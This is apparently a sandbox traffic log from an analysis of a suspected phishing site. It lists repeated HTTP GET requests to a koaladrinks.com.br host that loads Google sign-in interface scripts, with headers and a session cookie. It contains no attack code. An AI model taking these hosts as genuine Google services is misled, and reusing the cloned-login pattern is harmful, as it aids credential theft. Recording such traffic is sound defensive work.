/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NwH0H,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=NTMZac,sOXFj,STuCOe,NOeYWe,O6y8ed,q0xTif,oLggrd,inNHtf,L1AAkb,tUnxGc,aW3pY,I6YDgd,bSspM,AvtSve,xBaz7b,rv9FVb,ZZ4WUe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,b3kMqb,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,pxq3x,qmdT9,siKnQd,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,soHxf,YgOFye,oqkvIf,yRXbo,bTi8wc,ywOR5c,PHUIyb HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZwDk9d,RMhBfe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=iAskyc,ziXSP HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=K1ZKnb,ziZ8Mc,b3kMqb,mvkUhe,CMcBD,Fndnac,t2srLd,EN3i8d,z0u0L,xiZRqc HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZDZcre,OTA3Ae,xUdipf,NwH0H,w9hDv,A7fCU HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NwH0H,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=NTMZac,sOXFj,STuCOe,NOeYWe,O6y8ed,q0xTif,oLggrd,inNHtf,L1AAkb,tUnxGc,aW3pY,I6YDgd,bSspM,AvtSve,xBaz7b,rv9FVb,ZZ4WUe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=p3hmRc,LvGhrf,RqjULd HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
